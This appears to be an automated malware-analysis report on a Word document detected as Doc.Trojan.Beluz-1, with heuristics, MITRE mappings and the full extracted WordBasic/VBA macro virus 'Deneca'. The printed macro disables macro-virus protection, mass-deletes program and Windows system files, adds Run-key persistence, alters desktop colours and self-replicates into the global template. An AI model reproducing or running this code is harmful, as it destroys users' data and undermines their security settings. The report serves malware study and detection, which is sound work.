Verdict: MALICIOUS
Risk Score: 256

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains a legacy WordBasic macro with AutoOpen and Auto_Close routines, indicative of older malware. The macro attempts to delete files from common program directories and displays a deceptive message. The ClamAV detection 'Doc.Trojan.Beluz-1' further confirms its malicious nature. The presence of VBA macros and the AutoOpen function strongly suggest this is a malicious document delivered as a spearphishing attachment.
Heuristics (6)

- ClamAV: Doc.Trojan.Beluz-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Beluz-1.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code.
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `.VirusProtection = False`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro. Matched line in script: `Sub AutoClose()`
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5728 bytes |

SHA-256: 257754ed9f0c96675a9e1ea53fb5fd6d0585f0670574a7e30bcfd2bb923ce7fc

Detection:
- ClamAV: Doc.Trojan.Beluz-1
- Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Deneca"
'Virus macro name: Deneca
'************************
'Brasil 2005
'************************
Sub AutoOpen()
    On Error Resume Next
    With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
        Application.EnableCancelKey = wdCancelDisabled
    End With
    MsgBox " Computador foi modificado agora!", vbOKOnly + vbCritical, "Virus declara!!"
    WordBasic.Kill "C:\Program Files\Microsoft FrontPage\*.*"
    WordBasic.Kill "C:\Program Files\GetRight\*.*"
    WordBasic.Kill "C:\Program Files\Winzip\*.*"
    WordBasic.Kill "C:\Program Files\Winamp\*.*"
    WordBasic.Kill "C:\Arquivos de programas\Microsoft FrontPage\*.*"
    WordBasic.Kill "C:\Arquivos de programas\GetRight\*.*"
    WordBasic.Kill "C:\Arquivos de programas\Winzip\*.*"
    WordBasic.Kill "C:\Arquivos de programas\Winamp\*.*"
    WordBasic.Kill "C:\Windows\Application Data\*.*"
    WordBasic.Kill "C:\Windows\System\*.*"
    WordBasic.Kill "C:\Windows\Command\*.*"
    With ActiveDocument.Shapes.AddShape _
        (msoShapeIsoscelesTriangle, 80, 80, 90, 50).Fill
        .ForeColor.RGB = RGB(255, 255, 0)
        .BackColor.RGB = RGB(255, 0, 0)
        .Patterned msoPatternDarkVertical
    End With
    ActiveDocument.Shapes.AddTextEffect _
        PresetTextEffect:=msoTextEffect13, _
        Text:="Seu desktop foi modificado!!", _
        FontName:="Times New Roman ", _
        FontSize:=24, _
        FontBold:=True, _
        FontItalic:=False, _
        Left:=InchesToPoints(1), _
        Top:=InchesToPoints(1), _
        Anchor:=ActiveDocument.Paragraphs(1).Range
    With Assistant.NewBalloon
        .Icon = msoIconAlertCritical
        .Heading = "Virus diz!!"
        .Text = "Fui ativado."
        .Animation = msoAnimationWorkingAtSomething
        .Show
        ActiveDocument.SaveAs FileName:="C:\Beluz.doc"
        ActiveDocument.Saved = True
    End With
End Sub
Sub AutoClose()
    On Error Resume Next
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Deneca") = "Virus salvado"
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Especial") = "C:\ARQUIV~1\Deneca.bat"
    Open "C:\ARQUIV~1\Deneca.bat" For Output As #1
    Print #1, "@echo off"
    Print #1, "Echo Seu computador apresenta problemas."
    Print #1, "Echo Estou dentro de seu computador."
    Print #1, "Echo Word macro virus."
    Print #1, "Echo Infectado com macro virus."
    Print #1, "Echo Macro virus word ativado."
    Print #1, "Echo Problema encontrado."
    Print #1, "Echo Computador alterado."
    Print #1, "Echo Ano 2005."
    Close #1
    WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "Scrollbar", "255 0 0", "" 'Red
    WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "Background", "255 0 0", ""
    WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "Menu", "255 0 0", ""
    WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "Window", "255 0 0", ""
    WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "WindowFrame", "0 255 0", ""
    WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "MenuText", "0 255 0", ""
    WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "HilightText", "0 0 0", "" 'Black
    WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "ButtonFace", "255 0 0", ""
    WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "ButtonShadow", "255 0 0", ""
    WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "ButtonText", "0 255 0", ""
    WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "InactiveTitleText", "0 0 0", ""
    WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "ButtonDkShadow", "0 255 0", "" 'Green
    WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "ButtonLight", "255 0 0", ""
    WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "InfoText", "255 0 0", ""
    WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "InfoWindow", "0 255 0", ""
    WordBasic.SetPrivateProfileString "HKEY_USERS\.Default\Control Panel\Colors", "ButtonAlternateFace", "255 0 0", ""
    'Changes windows desktop colors to Red
    Set myRange = ActiveDocument.Content
    myRange.Find.Execute FindText:="a", _
        ReplaceWith:="HOHOHOHO", Replace:=wdReplaceAll
    iMacroCount = WordBasic.CountMacros(0, 0)
    For i = 1 To iMacroCount
        If WordBasic.[MacroName$](i, 0, 0) = "Deneca" Then
            binstalled = -1
        End If
        If WordBasic.[MacroName$](i, 0, 0) = "Deneca" Then
            bTooMuchTrouble = -1
        End If
    Next i
    If Not binstalled And Not bTooMuchTrouble Then
        sMe$ = WordBasic.[FileName$]()
        sMacro$ = sMe$ + ":Deneca"
        WordBasic.MacroCopy sMacro$, "Global:Deneca"
        sMacro$ = sMe$ + ":AutoClose"
        WordBasic.MacroCopy sMacro$, "Global:Deneca"
    End If
End Sub
Sub ToolsMacro()
    On Error Resume Next
    Application.DisplayStatusBar = False 'Disable Tools macro
End Sub
'Virus macro name: Deneca
'************************
'Year 2005
'************************
```